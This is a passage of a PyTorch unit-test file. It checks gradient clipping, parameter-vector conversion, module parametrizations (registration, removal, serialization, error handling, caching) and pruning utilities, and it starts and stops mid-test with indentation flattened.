self.assertLessEqual(p.grad.data.max(), clip_value)
self.assertGreaterEqual(p.grad.data.min(), -clip_value)
# Should accept a single Tensor as input
p1, p2 = torch.randn(10, 10), torch.randn(10, 10)
g = torch.arange(-50., 50).view(10, 10).div_(5)
p1._grad = g.clone()
p2._grad = g.clone()
clip_grad_value_(p1, clip_value)
clip_grad_value_([p2], clip_value)
self.assertEqual(p1.grad, p2.grad)
def test_parameters_to_vector(self):
conv1 = nn.Conv2d(3, 10, 5)
fc1 = nn.Linear(10, 20)
model = nn.Sequential(conv1, fc1)
vec = parameters_to_vector(model.parameters())
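# conv1: 10*3*5*5 weights + 10 biases = 760; fc1: 20*10 weights + 20
# biases = 220; 760 + 220 = 980 elements in total.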
self.assertEqual(vec.size(0), 980)
def test_vector_to_parameters(self):
conv1 = nn.Conv2d(3, 10, 5)
fc1 = nn.Linear(10, 20)
model = nn.Sequential(conv1, fc1)
vec = torch.arange(0., 980)
vector_to_parameters(vec, model.parameters())
sample = next(model.parameters())[0, 0, 0]
self.assertTrue(torch.equal(sample.data, vec.data[:5]))
# torch/nn/utils/parametrize
def test_register_and_remove_parametrization(self):
r"""Test that it is possible to add a few parametrizations
on a parameter or a buffer and that removing them restores the initial state
It also tests that backpropagating through them works as expected
"""
# Define a couple matrix parametrizations
class Skew(nn.Module):
def forward(self, X):
X = X.tril(-1)
return X - X.T
class Orthogonal(nn.Module):
def forward(self, X):
# Cayley map
# If X is skew-symmetric it returns an orthogonal matrix
Id = torch.eye(X.size(0), device=X.device)
# We call contiguous because solve returns a tensor with strides that are Fortran-contiguous
# and autograd raises a performance warning.
# This happens when we remove the parametrization with leave_parametrized=True,
# which does a set_ with a non-contiguous tensor while the gradient is contiguous
return torch.linalg.solve(Id + X, Id - X).contiguous()
class Resize(nn.Module):
def forward(self, X):
return X[[0]]
class NoResize(nn.Module):
def forward(self, X):
return X
# Define a couple vector parametrizations
class FirstZero(nn.Module):
def forward(self, x):
return torch.cat([x.new_zeros(1), x[1:]])
class LastZero(nn.Module):
def forward(self, x):
return torch.cat([x[:-1], x.new_zeros(1)])
model = nn.Linear(8, 8)
initial_weight_id = id(model.weight)
initial_bias_id = id(model.bias)
initial_model = deepcopy(model)
# Test unsafe flag
with self.assertRaisesRegex(ValueError, "Registering a parametrization may not change the shape of the tensor"):
parametrize.register_parametrization(model, "weight", Resize()) # default unsafe = False
model(torch.ones(8, 8))
# One parametrization with unsafe=True
parametrize.register_parametrization(model, "weight", Resize(), unsafe=True)
self.assertTrue(hasattr(model, "parametrizations"))
self.assertTrue(parametrize.is_parametrized(model))
self.assertTrue(parametrize.is_parametrized(model, "weight"))
self.assertFalse(parametrize.is_parametrized(model, "bias"))
self.assertNotIn("weight", model._parameters)
A = model.weight
self.assertTrue(A.shape[0] == 1)
parametrize.remove_parametrizations(model, "weight", leave_parametrized=False)
self.assertFalse(hasattr(model, "parametrizations"))
self.assertEqual(model.weight, initial_model.weight)
self.assertEqual(id(model.weight), initial_weight_id)
self.assertEqual(model.__class__, nn.Linear)
# Two parametrizations with unsafe=True
parametrize.register_parametrization(model, "weight", Resize(), unsafe=True)
parametrize.register_parametrization(model, "weight", NoResize(), unsafe=False)
self.assertTrue(hasattr(model, "parametrizations"))
self.assertTrue(parametrize.is_parametrized(model))
self.assertTrue(parametrize.is_parametrized(model, "weight"))
self.assertFalse(parametrize.is_parametrized(model, "bias"))
self.assertNotIn("weight", model._parameters)
A = model.weight
self.assertTrue(A.shape[0] == 1)
parametrize.remove_parametrizations(model, "weight", leave_parametrized=False)
self.assertFalse(hasattr(model, "parametrizations"))
self.assertEqual(model.weight, initial_model.weight)
self.assertEqual(id(model.weight), initial_weight_id)
self.assertEqual(model.__class__, nn.Linear)
# Test unsafe flag doesn't change expected behavior
parametrize.register_parametrization(model, "weight", Skew(), unsafe=True)
self.assertTrue(hasattr(model, "parametrizations"))
self.assertTrue(parametrize.is_parametrized(model))
self.assertTrue(parametrize.is_parametrized(model, "weight"))
self.assertFalse(parametrize.is_parametrized(model, "bias"))
self.assertNotIn("weight", model._parameters)
# Result should be skew-symmetric
A = model.weight
self.assertEqual(A, -A.T)
# Remove and check consistency
parametrize.remove_parametrizations(model, "weight", leave_parametrized=False)
self.assertFalse(hasattr(model, "parametrizations"))
self.assertEqual(model.weight, initial_model.weight)
self.assertEqual(id(model.weight), initial_weight_id)
self.assertEqual(model.__class__, nn.Linear)
# Test one parametrization
parametrize.register_parametrization(model, "weight", Skew())
self.assertTrue(hasattr(model, "parametrizations"))
self.assertTrue(parametrize.is_parametrized(model))
self.assertTrue(parametrize.is_parametrized(model, "weight"))
self.assertFalse(parametrize.is_parametrized(model, "bias"))
self.assertNotIn("weight", model._parameters)
# Result should be skew-symmetric
A = model.weight
self.assertEqual(A, -A.T)
# Remove and check consistency
parametrize.remove_parametrizations(model, "weight", leave_parametrized=False)
self.assertFalse(hasattr(model, "parametrizations"))
self.assertEqual(model.weight, initial_model.weight)
self.assertEqual(id(model.weight), initial_weight_id)
self.assertEqual(model.__class__, nn.Linear)
# Test two parametrizations at the same time and removing them
parametrize.register_parametrization(model, "weight", Skew())
parametrize.register_parametrization(model, "weight", Orthogonal())
# Result should be orthogonal
X = model.weight
Id = torch.eye(X.size(0), device=X.device)
self.assertEqual(X.T @ X, Id)
# Structure tests
self.assertTrue(hasattr(model, "parametrizations"))
self.assertTrue(parametrize.is_parametrized(model))
self.assertTrue(parametrize.is_parametrized(model, "weight"))
self.assertFalse(parametrize.is_parametrized(model, "bias"))
self.assertIn("weight", model.parametrizations)
self.assertNotIn("weight", model._parameters)
# Remove
parametrize.remove_parametrizations(model, "weight", leave_parametrized=False)
self.assertEqual(model.weight, initial_model.weight)
self.assertEqual(id(model.weight), initial_weight_id)
self.assertFalse(hasattr(model, "parametrizations"))
self.assertEqual(model.__class__, nn.Linear)
# Add everything
parametrize.register_parametrization(model, "weight", Skew())
parametrize.register_parametrization(model, "weight", Orthogonal())
parametrize.register_parametrization(model, "bias", FirstZero())
parametrize.register_parametrization(model, "bias", LastZero())
# Basic tests
self.assertTrue(parametrize.is_parametrized(model))
self.assertTrue(parametrize.is_parametrized(model, "weight"))
self.assertTrue(parametrize.is_parametrized(model, "bias"))
self.assertEqual(model.bias[0].item(), 0.)
self.assertEqual(model.bias[-1].item(), 0.)
        self.assertEqual(len(list(model.parameters())), 2)  # Nothing weird has happened
# Should not throw
sgd = torch.optim.SGD(model.parameters(), lr=0.01)
weight_copy = model.weight.clone()
bias_copy = model.bias.clone()
sgd.zero_grad()
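        # A scalar loss that depends on both parametrized tensors, so the
        # backward pass traverses both parametrization graphs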
(model.weight.T @ model.bias).sum().backward()
sgd.step()
self.assertNotEqual(model.weight, weight_copy)
self.assertNotEqual(model.bias, bias_copy)
# Remove first parametrization.
# Check that the model is still parametrized and so is the second parameter
parametrize.remove_parametrizations(model, "weight", leave_parametrized=False)
self.assertTrue(parametrize.is_parametrized(model)) # Still parametrized
self.assertFalse(parametrize.is_parametrized(model, "weight")) # Parametrization removed
self.assertTrue(parametrize.is_parametrized(model, "bias")) # Still parametrized
self.assertEqual(model.bias[0].item(), 0.) # Still parametrized
self.assertEqual(model.bias[-1].item(), 0.) # Still parametrized
self.assertNotEqual(model.weight, initial_model.weight) # Has been updated
self.assertEqual(id(model.weight), initial_weight_id) # Keeps the same id
self.assertEqual(len(list(model.parameters())), 2) # Nothing weird has happened
# Should not throw
weight_copy = model.weight.clone()
bias_copy = model.bias.clone()
sgd.zero_grad()
(model.weight.T @ model.bias).sum().backward()
sgd.step()
self.assertNotEqual(model.weight, weight_copy)
self.assertNotEqual(model.bias, bias_copy)
# Remove the second parametrization.
# Check that the module is not parametrized
parametrize.remove_parametrizations(model, "bias", leave_parametrized=False)
self.assertFalse(parametrize.is_parametrized(model)) # Not parametrized
self.assertNotEqual(model.bias, initial_model.bias) # Has been updated
self.assertNotEqual(model.bias[0].item(), 0.) # Not parametrized
self.assertNotEqual(model.bias[-1].item(), 0.) # Not parametrized
self.assertEqual(id(model.bias), initial_bias_id) # Keeps the same id
self.assertFalse(hasattr(model, "parametrizations")) # Not parametrized the module
self.assertEqual(model.__class__, nn.Linear) # Resores the previous class
self.assertEqual(len(list(model.parameters())), 2) # Nothing weird has happeed
# Should not throw things are updated
weight_copy = model.weight.clone()
bias_copy = model.bias.clone()
sgd.zero_grad()
(model.weight.T @ model.bias).sum().backward()
sgd.step()
self.assertNotEqual(model.weight, weight_copy)
self.assertNotEqual(model.bias, bias_copy)
# Test leave_parametrized=True
for _ in range(2):
parametrize.register_parametrization(model, "weight", Skew())
parametrize.register_parametrization(model, "weight", Orthogonal())
parametrize.remove_parametrizations(model, "weight", leave_parametrized=True)
        # We didn't change the dtype or have multiple inputs, so the id should be the same
self.assertEqual(id(model.weight), initial_weight_id)
self.assertEqual(id(model.bias), initial_bias_id)
# Should not throw. Things are updated
weight_copy = model.weight.clone()
bias_copy = model.bias.clone()
sgd.zero_grad()
(model.weight.T @ model.bias).sum().backward()
sgd.step()
self.assertNotEqual(model.weight, weight_copy)
self.assertNotEqual(model.bias, bias_copy)
def test_register_and_remove_buffer_parametrization(self):
r"""Test that it is possible to add and remove parametrizations on buffers"""
# Define a couple vector parametrizations
class FirstZero(nn.Module):
def forward(self, x):
return torch.cat([x.new_zeros(1), x[1:]])
class LastZero(nn.Module):
def forward(self, x):
return torch.cat([x[:-1], x.new_zeros(1)])
model = nn.Linear(8, 8)
# Instantiate parametrizations on buffers. It should work as expected
delattr(model, "bias")
model.register_buffer("bias", torch.ones(8))
parametrize.register_parametrization(model, "bias", FirstZero())
parametrize.register_parametrization(model, "bias", LastZero())
self.assertTrue(parametrize.is_parametrized(model))
self.assertTrue(parametrize.is_parametrized(model, "bias"))
self.assertEqual(model.bias[0].item(), 0.)
self.assertEqual(model.bias[-1].item(), 0.)
self.assertTrue((model.bias[1:-1] == torch.ones(6)).all())
self.assertEqual(len(list(model.parameters())), 1)
# Remove parametrizations on buffers. It should work as expected
parametrize.remove_parametrizations(model, "bias", leave_parametrized=True)
self.assertFalse(parametrize.is_parametrized(model))
self.assertFalse(parametrize.is_parametrized(model, "bias"))
self.assertEqual(model.bias[0].item(), 0.)
self.assertEqual(model.bias[-1].item(), 0.)
self.assertTrue((model.bias[1:-1] == torch.ones(6)).all())
self.assertEqual(len(list(model.parameters())), 1)
def test_serialization_parametrization(self):
r"""Test that it is possible to serialize a parametrized model via state_dict"""
# A stateful parametrization
class Orthogonal(nn.Module):
def __init__(self, n):
super().__init__()
self.register_buffer("id", torch.eye(n))
self.register_buffer("B", torch.empty(n, n))
init.orthogonal_(self.B)
def forward(self, X):
A = X.triu(1)
A = A - A.T
return self.B @ torch.linalg.solve(self.id + A, self.id - A)
def get_model():
model = torch.nn.Sequential(
torch.nn.Linear(5, 5),
torch.nn.ReLU(),
torch.nn.Linear(5, 1),
)
parametrize.register_parametrization(model[0], "weight", Orthogonal(5))
return model
model = get_model()
prev_weight = model[0].weight
prev_B = model[0].parametrizations.weight[0].B
new_model = get_model()
with TemporaryFileName() as fname:
torch.save(model.state_dict(), fname)
new_model.load_state_dict(torch.load(fname))
# Integrity tests
self.assertTrue(parametrize.is_parametrized(new_model[0], "weight"))
self.assertEqual(prev_weight, new_model[0].weight)
self.assertEqual(prev_B, new_model[0].parametrizations.weight[0].B)
# Trying to save the whole parametrized model raises
with self.assertRaisesRegex(RuntimeError, "state_dict"):
with TemporaryFileName() as fname:
torch.save(model, fname)
def test_initialization_parametrization(self):
r"""Test that it is possible to initialize a parametrization when it
implements a `right_inverse` method
"""
class Skew(nn.Module):
def forward(self, X):
A = X.triu(1)
return A - A.T
def is_skew(self, A):
return torch.allclose(A, -A.T, atol=1e-6)
def right_inverse(self, X):
if not self.is_skew(X):
raise ValueError("The matrix is not skew-symmetric.")
return X.triu(1)
# Implements a Cayley map where right_inverse is not quite the inverse of forward
class Orthogonal(nn.Module):
def __init__(self, n):
super().__init__()
self.register_buffer("B", torch.eye(n))
def forward(self, X):
Id = torch.eye(X.size(0))
return self.B @ torch.linalg.solve(Id + X, Id - X)
def is_orthogonal(self, X):
Id = torch.eye(X.size(0))
return torch.allclose(X.T @ X, Id, atol=1e-4)
def right_inverse(self, X):
if not self.is_orthogonal(X):
raise ValueError("The input is not orthogonal.")
# cayley(0) == Id, so B @ cayley(0) == B
self.B = X
return torch.zeros_like(X)
N = 5
model = nn.Linear(N, N)
# Register the skew-symmetric constraint. The result is now skew-symmetric
skew = Skew()
# Make the weight skew-symmetric before registering the parametrization
with torch.no_grad():
model.weight.set_(skew(model.weight))
parametrize.register_parametrization(model, "weight", skew)
X = torch.rand(N, N)
# X is not skew-symmetric, so it throws an error
with self.assertRaises(ValueError):
model.weight = X
# Make X skew-symmetric
X = X - X.T
model.weight = X
self.assertEqual(model.parametrizations.weight.original, X.triu(1))
self.assertEqual(model.weight, X)
        # Having several parametrizations registered should work in the same way
        # Register now the Cayley map. The result will now be orthogonal
        parametrize.register_parametrization(model, "weight", Orthogonal(N))
X = torch.rand(N, N)
# X is not orthogonal, so it throws an error
with self.assertRaises(ValueError):
model.weight = X
init.orthogonal_(X)
model.weight = X
self.assertEqual(model.weight, X)
self.assertEqual(model.parametrizations.weight.original, torch.zeros_like(X))
def test_errors_unparametrized_tensor_parametrization(self):
# Test errors when registering a parametrization on an unparametrized tensor
module = nn.Linear(3, 4)
weight_init = module.weight.clone()
class Identity(nn.Module):
def forward(self, x):
return x
        # Registering a parametrization on a non-existing parameter throws
with self.assertRaisesRegex(ValueError, "does not have a parameter"):
parametrize.register_parametrization(module, "foo", Identity())
self.assertFalse(parametrize.is_parametrized(module))
# Removing parametrizations from an unparametrized tensor throws
with self.assertRaisesRegex(ValueError, "does not have a parametrization"):
parametrize.remove_parametrizations(module, "bias")
self.assertFalse(parametrize.is_parametrized(module))
# A correct parametrization with several outputs
class Sum(nn.Module):
def forward(self, x, y):
return x + y
def right_inverse(self, z):
return z, torch.zeros_like(z)
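        # Sum's right_inverse splits one tensor into two, so the registered
        # parametrization stores two unconstrained tensors (original0, original1)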
parametrize.register_parametrization(module, "weight", Sum())
# Cannot remove a parametrization with several outputs with `leave_parametrized=False`
with self.assertRaisesRegex(ValueError, "leave_parametrized=False"):
parametrize.remove_parametrizations(module, "weight", leave_parametrized=False)
parametrize.remove_parametrizations(module, "weight", leave_parametrized=True)
# A parametrization with an incorrect number of outputs
class WrongNumberParams(nn.Module):
def forward(self, x, y, z):
return x + y + z
def right_inverse(self, w):
return w, torch.zeros_like(w)
# Makes param(*param.right_inverse(X)) fail
with self.assertRaisesRegex(TypeError, "positional argument"):
parametrize.register_parametrization(module, "weight", WrongNumberParams())
self.assertFalse(parametrize.is_parametrized(module))
# A parametrization with a right_inverse that does not return a Tensor or Sequence[Tensor]
class WrongRightInverse(Identity):
def right_inverse(self, z):
return None
# right_inverse should return a Tensor or a Sequence[Tensor]
with self.assertRaisesRegex(ValueError, "Tensor or a Sequence of"):
parametrize.register_parametrization(module, "weight", WrongRightInverse())
self.assertFalse(parametrize.is_parametrized(module))
        # If it's a sequence, it must be a sequence of tensors
class WrongRightInverseSequence(nn.Module):
def forward(self, x, y):
return x
def right_inverse(self, z):
return None, z
with self.assertRaisesRegex(ValueError, "of the sequence with type"):
parametrize.register_parametrization(module, "weight", WrongRightInverseSequence())
self.assertFalse(parametrize.is_parametrized(module))
# A parametrization from one tensor to one tensor that changes the dtype
class ChangeDtypeInverse(nn.Module):
def forward(self, x):
return x.float()
def right_inverse(self, w):
return w.bool()
# For parametrizations that return one tensor, right_inverse may not change the dtype
with self.assertRaisesRegex(ValueError, "outputs one tensor, it may not change the dtype"):
parametrize.register_parametrization(module, "weight", ChangeDtypeInverse())
self.assertFalse(parametrize.is_parametrized(module))
# Doesn't return a tensor
class NotTensor(nn.Module):
def forward(self, x):
return 2
# Forward must return a tensor
with self.assertRaisesRegex(ValueError, "must return a tensor"):
parametrize.register_parametrization(module, "weight", NotTensor())
self.assertFalse(parametrize.is_parametrized(module))
# A parametrization from one tensor to one tensor that changes the dtype
class ChangeDtype(nn.Module):
def forward(self, x):
return x.bool()
# forward should not change the initial dtype
with self.assertRaisesRegex(ValueError, "may not change the dtype"):
parametrize.register_parametrization(module, "weight", ChangeDtype())
self.assertFalse(parametrize.is_parametrized(module))
# Change shape
class ChangeShape(nn.Module):
def forward(self, x):
return x[:-1]
# forward should not change the original shape
with self.assertRaisesRegex(ValueError, "may not change the shape"):
parametrize.register_parametrization(module, "weight", ChangeShape())
self.assertFalse(parametrize.is_parametrized(module))
# Many to one that changes dtype
class ChangeDtypeMulti(nn.Module):
def forward(self, x, y):
return (x + y).bool()
def right_inverse(self, w):
return w, w + 1
        # forward should not change the original dtype even for parametrizations with many inputs
with self.assertRaisesRegex(ValueError, "may not change the dtype"):
parametrize.register_parametrization(module, "weight", ChangeDtypeMulti())
self.assertFalse(parametrize.is_parametrized(module))
        # Returning a sequence of length one, although weird, is correct
class SequenceLen1(nn.Module):
def forward(self, x):
return x
def right_inverse(self, w):
return (w,)
parametrize.register_parametrization(module, "weight", SequenceLen1())
self.assertTrue(hasattr(module.parametrizations.weight, "original0"))
self.assertFalse(hasattr(module.parametrizations.weight, "original1"))
_ = module.weight # Does not throw
self.assertTrue(parametrize.is_parametrized(module))
parametrize.remove_parametrizations(module, "weight", leave_parametrized=True)
# None of the operations above should have altered the weight
self.assertFalse(parametrize.is_parametrized(module))
self.assertEqual(module.weight, weight_init)
def test_errors_parametrized_tensor_parametrization(self):
# Test errors when registering a parametrization on a parametrized tensor
class Identity(nn.Module):
def forward(self, x):
return x
module = nn.Linear(3, 4)
parametrize.register_parametrization(module, "weight", Identity())
# Has to return a tensor
class WrongReturn(nn.Module):
def forward(self, x):
return x, x
with self.assertRaisesRegex(ValueError, "must return a tensor"):
parametrize.register_parametrization(module, "weight", WrongReturn())
self.assertTrue(parametrize.is_parametrized(module))
self.assertEqual(len(module.parametrizations.weight), 1)
self.assertTrue(isinstance(module.parametrizations.weight[0], Identity))
# Cannot change dtype
class ChangeDtype(nn.Module):
def forward(self, x):
return x.bool()
with self.assertRaisesRegex(ValueError, "may not change the dtype"):
parametrize.register_parametrization(module, "weight", ChangeDtype())
self.assertTrue(parametrize.is_parametrized(module))
self.assertEqual(len(module.parametrizations.weight), 1)
self.assertTrue(isinstance(module.parametrizations.weight[0], Identity))
# Cannot change shape
class ChangeShape(nn.Module):
def forward(self, x):
return x[:-1]
with self.assertRaisesRegex(ValueError, "may not change the shape"):
parametrize.register_parametrization(module, "weight", ChangeShape())
self.assertTrue(parametrize.is_parametrized(module))
self.assertEqual(len(module.parametrizations.weight), 1)
self.assertTrue(isinstance(module.parametrizations.weight[0], Identity))
# The following checks are mostly due to bugs in the code of the parametrization
# right_inverse has to return a tensor
class WrongReturnInverse(Identity):
def right_inverse(self, x):
return x, x
with self.assertRaisesRegex(ValueError, "right_inverse must return a tensor"):
parametrize.register_parametrization(module, "weight", WrongReturnInverse())
self.assertTrue(parametrize.is_parametrized(module))
self.assertEqual(len(module.parametrizations.weight), 1)
self.assertTrue(isinstance(module.parametrizations.weight[0], Identity))
# Cannot change dtype
class ChangeDtypeInverse(Identity):
def right_inverse(self, x):
return x.bool()
with self.assertRaisesRegex(ValueError, "must have the same dtype"):
parametrize.register_parametrization(module, "weight", ChangeDtypeInverse())
self.assertTrue(parametrize.is_parametrized(module))
self.assertEqual(len(module.parametrizations.weight), 1)
self.assertTrue(isinstance(module.parametrizations.weight[0], Identity))
# Cannot change shape
class ChangeShapeInverse(Identity):
def right_inverse(self, x):
return x[:-1]
with self.assertRaisesRegex(ValueError, "must have the same shape"):
parametrize.register_parametrization(module, "weight", ChangeShapeInverse())
self.assertTrue(parametrize.is_parametrized(module))
self.assertEqual(len(module.parametrizations.weight), 1)
self.assertTrue(isinstance(module.parametrizations.weight[0], Identity))
def test_multiple_inputs_parametrization(self):
# A parametrization with several outputs
class RankOne(nn.Module):
def forward(self, x, y):
# Form a rank-1 matrix from a pair of vectors
return x.unsqueeze(-1) @ y.unsqueeze(-2)
def right_inverse(self, Y):
# We project the given matrix onto the rank 1 matrices
U, S, Vh = torch.linalg.svd(Y, full_matrices=False)
                # S is sorted in decreasing order.
s0_sqrt = S[0].sqrt().unsqueeze(-1)
return U[..., :, 0] * s0_sqrt, Vh[..., 0, :] * s0_sqrt
        # A simple parametrization
class Double(nn.Module):
def forward(self, x):
return 2.0 * x
def right_inverse(self, w):
return 0.5 * w
model = nn.Linear(3, 3)
# Test one parametrization
parametrize.register_parametrization(model, "weight", RankOne())
self.assertTrue(hasattr(model, "parametrizations"))
self.assertTrue(parametrize.is_parametrized(model))
self.assertTrue(parametrize.is_parametrized(model, "weight"))
self.assertTrue(hasattr(model.parametrizations.weight, "original0"))
self.assertIn("original0", model.parametrizations.weight._parameters)
self.assertTrue(hasattr(model.parametrizations.weight, "original1"))
self.assertIn("original1", model.parametrizations.weight._parameters)
self.assertFalse(parametrize.is_parametrized(model, "bias"))
self.assertNotIn("weight", model._parameters)
# Result should be rank 1
self.assertEqual(torch.linalg.matrix_rank(model.weight).item(), 1)
with self.assertRaisesRegex(ValueError, "leave_parametrized=False"):
# Cannot remove a parametrization with multiple inputs and not leave it parametrized
parametrize.remove_parametrizations(model, "weight", leave_parametrized=False)
# Remove parametrization and check consistency
parametrize.remove_parametrizations(model, "weight", leave_parametrized=True)
self.assertFalse(hasattr(model, "parametrizations"))
self.assertEqual(model.__class__, nn.Linear)
self.assertFalse(parametrize.is_parametrized(model))
self.assertEqual(torch.linalg.matrix_rank(model.weight).item(), 1)
self.assertIn("weight", model._parameters)
# Registering parametrizations with one input on top of one with multiple inputs should work
init_weight = model.weight.clone()
parametrize.register_parametrization(model, "weight", RankOne())
        # Projecting a rank-1 matrix onto the rank-1 matrices does not change it
self.assertEqual(init_weight, model.weight)
parametrize.register_parametrization(model, "weight", Double())
# The matrix now is twice the initial matrix
self.assertEqual(2.0 * init_weight, model.weight)
# Multiplying by a scalar does not change the rank
self.assertEqual(torch.linalg.matrix_rank(model.weight).item(), 1)
# The model has now three parameters
self.assertEqual(len(list(model.parameters())), 3)
sgd = torch.optim.SGD(model.parameters(), lr=0.1)
# Test backward. Should not throw
for _ in range(2):
sgd.zero_grad()
loss = (model.weight.T @ model.bias).sum()
loss.backward()
sgd.step()
# Same drill as before, removing should work as expected
with self.assertRaisesRegex(ValueError, "leave_parametrized=False"):
# Cannot remove a parametrization with multiple inputs and not leave it parametrized
parametrize.remove_parametrizations(model, "weight", leave_parametrized=False)
# Remove parametrization and check consistency
parametrize.remove_parametrizations(model, "weight", leave_parametrized=True)
self.assertFalse(hasattr(model, "parametrizations"))
self.assertEqual(model.__class__, nn.Linear)
self.assertFalse(parametrize.is_parametrized(model))
self.assertEqual(torch.linalg.matrix_rank(model.weight).item(), 1)
self.assertIn("weight", model._parameters)
        # The model now has two parameters
self.assertEqual(len(list(model.parameters())), 2)
# Test backward. Should not throw
sgd = torch.optim.SGD(model.parameters(), lr=0.1)
for _ in range(2):
sgd.zero_grad()
loss = (model.weight.T @ model.bias).sum()
loss.backward()
sgd.step()
def test_caching_parametrization(self):
r"""Test the caching system of a parametrization"""
# Define a couple matrix parametrizations
class Skew(nn.Module):
def forward(self, X):
X = X.tril(-1)
return X - X.T
class Orthogonal(nn.Module):
def forward(self, X):
Id = torch.eye(X.size(0), device=X.device)
return torch.linalg.solve(Id + X, Id - X)
model = nn.Linear(5, 5)
parametrize.register_parametrization(model, "weight", Skew())
parametrize.register_parametrization(model, "weight", Orthogonal())
# Test that the caching system works
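        # Inside parametrize.cached() the parametrized tensor is computed once
        # and memoized, so repeated accesses return the very same object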
with parametrize.cached():
X = model.weight
Y = model.weight
self.assertEqual(id(X), id(Y))
def test_parametrization_same_training_mode(self):
r"""Test training mode updated on parametrization registration"""
class Identity(nn.Module):
def forward(self, X):
return X
module = nn.Linear(4, 4)
module.eval()
parametrize.register_parametrization(module, "weight", Identity())
self.assertFalse(module.parametrizations.weight[0].training)
module.train()
parametrize.register_parametrization(module, "weight", Identity().eval())
self.assertTrue(module.parametrizations.weight[0].training)
self.assertTrue(module.parametrizations.weight[1].training)
# torch/nn/utils/prune.py
@unittest.skipIf(not TEST_NUMPY, "numpy not found")
def test_validate_pruning_amount_init(self):
r"""Test the first util function that validates the pruning
amount requested by the user the moment the pruning method
is initialized. This test checks that the expected errors are
raised whenever the amount is invalid.
The original function runs basic type checking + value range checks.
It doesn't check the validity of the pruning amount with
respect to the size of the tensor to prune. That's left to
`_validate_pruning_amount`, tested below.
"""
        # an amount that is neither float nor int should raise a TypeError
with self.assertRaises(TypeError):
prune._validate_pruning_amount_init(amount="I'm a string")
# float not in [0, 1] should raise ValueError
with self.assertRaises(ValueError):
prune._validate_pruning_amount_init(amount=1.1)
with self.assertRaises(ValueError):
prune._validate_pruning_amount_init(amount=20.)
# negative int should raise ValueError
with self.assertRaises(ValueError):
prune._validate_pruning_amount_init(amount=-10)
# all these should pass without errors because they're valid amounts
prune._validate_pruning_amount_init(amount=0.34)
prune._validate_pruning_amount_init(amount=1500)
prune._validate_pruning_amount_init(amount=0)
prune._validate_pruning_amount_init(amount=0.)
prune._validate_pruning_amount_init(amount=1)
prune._validate_pruning_amount_init(amount=1.)
self.assertTrue(True)
@unittest.skipIf(not TEST_NUMPY, "numpy not found")
def test_validate_pruning_amount(self):
r"""Tests the second util function that validates the pruning
amount requested by the user, this time with respect to the size
of the tensor to prune. The rationale is that if the pruning amount,
converted to absolute value of units to prune, is larger than
the number of units in the tensor, then we expect the util function
to raise a value error.
"""
# if amount is int and amount > tensor_size, raise ValueError
with self.assertRaises(ValueError):
prune._validate_pruning_amount(amount=20, tensor_size=19)
# amount is a float so this should not raise an error
prune._validate_pruning_amount(amount=0.3, tensor_size=0)
# this is okay
prune._validate_pruning_amount(amount=19, tensor_size=20)
prune._validate_pruning_amount(amount=0, tensor_size=0)
prune._validate_pruning_amount(amount=1, tensor_size=1)
self.assertTrue(True)
@unittest.skipIf(not TEST_NUMPY, "numpy not found")
def test_compute_nparams_to_prune(self):
r"""Test that requested pruning `amount` gets translated into the
correct absolute number of units to prune.
"""
self.assertEqual(
prune._compute_nparams_toprune(amount=0, tensor_size=15),
0
)
self.assertEqual(
prune._compute_nparams_toprune(amount=10, tensor_size=15),
10
)
# if 1 is int, means 1 unit
self.assertEqual(
prune._compute_nparams_toprune(amount=1, tensor_size=15),
1
)
# if 1. is float, means 100% of units
self.assertEqual(
prune._compute_nparams_toprune(amount=1., tensor_size=15),
15
)
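        # float amounts are rounded to the nearest int: 0.4 * 17 = 6.8 -> 7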
self.assertEqual(
prune._compute_nparams_toprune(amount=0.4, tensor_size=17),
7
)
def test_random_pruning_sizes(self):
r"""Test that the new parameters and buffers created by the pruning
method have the same size as the input tensor to prune. These, in
fact, correspond to the pruned version of the tensor itself, its
mask, and its original copy, so the size must match.
"""
# fixturize test
# TODO: add other modules
modules = [nn.Linear(5, 7), nn.Conv3d(2, 2, 2)]
names = ['weight', 'bias']
for m in modules:
for name in names:
with self.subTest(m=m, name=name):
original_tensor = getattr(m, name)
prune.random_unstructured(m, name=name, amount=0.1)
# mask has the same size as tensor being pruned
self.assertEqual(
original_tensor.size(),
getattr(m, name + '_mask').size()
)
# 'orig' tensor has the same size as the original tensor
self.assertEqual(
original_tensor.size(),
getattr(m, name + '_orig').size()
)
# new tensor has the same size as the original tensor
self.assertEqual(
original_tensor.size(),
getattr(m, name).size()
)
def test_random_pruning_orig(self):
r"""Test that original tensor is correctly stored in 'orig'
after pruning is applied. Important to make sure we don't
lose info about the original unpruned parameter.
"""
# fixturize test
# TODO: add other modules
modules = [nn.Linear(5, 7), nn.Conv3d(2, 2, 2)]
names = ['weight', 'bias']
for m in modules:
for name in names:
with self.subTest(m=m, name=name):
# tensor prior to pruning
original_tensor = getattr(m, name)
prune.random_unstructured(m, name=name, amount=0.1)
self.assertEqual(
original_tensor,
getattr(m, name + '_orig')
)
def test_random_pruning_new_weight(self):
r"""Test that module.name now contains a pruned version of
the original tensor obtained from multiplying it by the mask.
"""
# fixturize test
# TODO: add other modules
modules = [nn.Linear(5, 7), nn.Conv3d(2, 2, 2)]
names = ['weight', 'bias']
for m in modules:
for name in names:
with self.subTest(m=m, name=name):
# tensor prior to pruning
original_tensor = getattr(m, name)
prune.random_unstructured(m, name=name, amount=0.1)
# weight = weight_orig * weight_mask
self.assertEqual(
getattr(m, name),
getattr(m, name + '_orig')
* getattr(m, name + '_mask').to(
dtype=original_tensor.dtype
),
)
def test_identity_pruning(self):
r"""Test that a mask of 1s does not change forward or backward.
"""
input_ = torch.ones(1, 5)
m = nn.Linear(5, 2)
y_prepruning = m(input_) # output prior to pruning
# compute grad pre-pruning and check it's equal to all ones
y_prepruning.sum().backward()
old_grad_weight = m.weight.grad.clone() # don't grab pointer!
self.assertEqual(old_grad_weight, torch.ones_like(m.weight))
old_grad_bias = m.bias.grad.clone()
self.assertEqual(old_grad_bias, torch.ones_like(m.bias))
# remove grads
m.zero_grad()
# force the mask to be made of all 1s
prune.identity(m, name="weight")
# with mask of 1s, output should be identical to no mask
y_postpruning = m(input_)
self.assertEqual(y_prepruning, y_postpruning)
# with mask of 1s, grad should be identical to no mask
y_postpruning.sum().backward()
self.assertEqual(old_grad_weight, m.weight_orig.grad)
self.assertEqual(old_grad_bias, m.bias.grad)
# calling forward twice in a row shouldn't change output
y1 = m(input_)
y2 = m(input_)
self.assertEqual(y1, y2)
def test_random_pruning_0perc(self):
r"""Test that a mask of 1s does not change forward or backward.
"""
input_ = torch.ones(1, 5)
m = nn.Linear(5, 2)
y_prepruning = m(input_) # output prior to pruning
